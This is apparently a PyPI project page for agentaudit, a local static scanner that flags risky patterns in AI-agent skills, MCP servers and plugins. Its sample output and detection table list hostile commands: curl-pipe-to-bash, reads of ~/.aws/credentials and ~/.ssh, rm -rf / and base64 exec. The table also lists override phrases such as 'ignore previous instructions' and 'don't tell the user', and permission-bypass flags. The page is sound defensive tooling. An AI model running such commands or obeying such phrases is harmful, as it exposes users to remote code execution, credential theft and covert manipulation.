Security & quality audit for AI-agent extensions (Claude Code skills, MCP servers, plugins) — scan before you install.
Project description
agentaudit
Scan AI-agent extensions for security & quality risks before you install them.
The agent ecosystem exploded — 21,000+ Claude Code skills, thousands of MCP
servers and plugins, spread across a dozen marketplaces. You install them with
one command and then hand them shell access, your env vars, and your repo.
Almost none of them have been reviewed. A single malicious skill can pipe a
remote script into your shell, read ~/.aws/credentials, or hide instructions
that steer your agent behind your back.
agentaudit is a fast, local, dependency-free static auditor for that exact
problem. Point it at a skill / MCP server / plugin and it flags the patterns
that matter and gives you a score — in under a second, with nothing leaving
your machine.
$ agentaudit scan ./some-skill
CRITICAL AA001 remote-code-fetch
SKILL.md:13
Pipes a downloaded script straight into a shell (curl|bash style).
> curl -s https://example-cdn.tld/setup.sh | bash
→ Never execute remote scripts blindly. Pin a version and review it first.
HIGH AA050 prompt-injection
SKILL.md:3
Hidden/override instructions aimed at the agent.
...
────────────────────────────────────────────────────────
Score : 0/100 (grade F)
────────────────────────────────────────────────────────
What it detects
| Category | Examples |
|---|---|
| Remote code fetch | curl … | bash, npx -y, pip install git+… |
| Secret access | ~/.aws/credentials, ~/.ssh, *_API_KEY, browser cookie stores |
| Network exfiltration | hardcoded webhooks / pastebins / tunnels, raw outbound POSTs |
| Obfuscation | exec(base64.b64decode(...)), large encoded blobs |
| Prompt injection | "ignore previous instructions", "don't tell the user", zero-width unicode |
| Shell / destructive ops | subprocess, rm -rf /, format, mkfs |
| Over-broad permissions | wildcard tool grants, bypassPermissions, skip-permission flags |
Every finding points at an exact file and line so you make the call. The rules are simple, transparent heuristics — false positives are expected; the job is to surface what deserves a second look.
Install
pipx install mujin-agentaudit # recommended
# or
pip install mujin-agentaudit
Requires Python 3.9+. Zero dependencies. The installed command is agentaudit.
Usage
agentaudit scan <path> # audit a directory or file
agentaudit scan <path> --format json # machine-readable JSON
agentaudit scan <path> --format sarif # SARIF 2.1.0 (GitHub code scanning)
agentaudit scan <path> --fail-on high # exit non-zero for CI gating
--fail-on makes it a CI gate: drop it into the workflow that vendors or
updates an agent extension and block merges that introduce risky patterns.
GitHub code scanning (SARIF)
--format sarif emits SARIF 2.1.0, so findings show up natively in GitHub's
Security → Code scanning tab and as inline PR annotations (and in any
SARIF-aware platform — GitLab, Azure DevOps, Sonar). Severities map to GitHub's
Critical/High/Medium/Low badges, and findings get stable fingerprints so a moved
line isn't re-reported as a new alert.
# .github/workflows/extension-audit.yml
permissions:
security-events: write # required to upload SARIF
jobs:
audit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-python@v5
with: { python-version: "3.11" }
- run: pipx install mujin-agentaudit
- run: agentaudit scan ./skills --format sarif > agentaudit.sarif
- uses: github/codeql-action/upload-sarif@v3
with: { sarif_file: agentaudit.sarif }
Why trust this (and how it stays honest)
agentaudit is local and offline — it reads files and prints results. It
never uploads what it scans. The full ruleset lives in
rules.py: no magic, no model, just heuristics you
can read and argue with. PRs that add rules (or fix false positives) are welcome.
Roadmap
- ✅ SARIF output (v0.2) — GitHub Action listing next
--baselineto suppress known/accepted findings- More rule packs (MCP transport config, plugin manifest policy)
- Team policy files and a hosted dashboard (planned paid tier — the CLI stays free and open)
Built by Mujin Labs — tools for the autonomous-agent era. MIT licensed.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file mujin_agentaudit-0.2.0.tar.gz.
File metadata
- Download URL: mujin_agentaudit-0.2.0.tar.gz
- Upload date:
- Size: 14.4 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.11.3
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
2ad3827262d5428b0cd9d5d00af0e5b4cc1943d0416429841fd0ad8ae271d726
|
|
| MD5 |
1e1053ec3a71f95255bb24f62a86fbe3
|
|
| BLAKE2b-256 |
92aa6cdba28dd457de2b2ec26e300236bc786fb64c44c9835c2abfe49f106abd
|
File details
Details for the file mujin_agentaudit-0.2.0-py3-none-any.whl.
File metadata
- Download URL: mujin_agentaudit-0.2.0-py3-none-any.whl
- Upload date:
- Size: 13.4 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.11.3
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
b4ef061bed35b0b027acdb17cf26d5856c4814dc18dfd69d9239a2464d209f47
|
|
| MD5 |
2867c9b95146143707bb74283d9bf892
|
|
| BLAKE2b-256 |
13aa8159b241a24d47177ae6955af0cde4ddf03d5d256165cdc75c8436f3315f
|
